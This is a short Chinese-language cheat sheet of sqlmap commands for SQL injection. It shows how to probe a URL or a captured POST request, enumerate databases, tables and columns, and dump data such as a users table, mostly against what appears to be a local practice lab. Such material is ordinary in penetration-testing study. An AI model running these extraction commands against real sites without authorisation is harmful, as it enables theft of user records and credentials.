目录

sqlmap常用命令

sqlmap常用命令

@ZZHow(ZZHow1024)

一、扫描注入点

1.GET方法,给URL:

  • #探测该url是否存在漏洞
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"
  • #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
python sqlmap.py -u "http://www.xx.com/username/admin*"

2.POST方法,给抓包文件:

  • #bp.txt是我们抓取的http的请求包
python sqlmap.py -r bp.txt  
  • #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
python sqlmap.py -r bp.txt -p username  

二、爆基本信息自动化

0.查看当前的数据库

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --current-db

1.爆出所有的数据库

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --dbs

2.爆出所有的数据表

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --tables

3.爆出数据库中所有的字段

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --columns

三、爆具体信息自动化

1.爆出数据库security中的所有的表

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables

2.爆出security数据库中users表中的所有的字段

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns

爆出数据库security中的users表中的username字段中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump 

四、爆信数据自动化

1.爆出该数据库中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all

2.爆出数据库security中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all

3.爆出数据库security中的users表中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all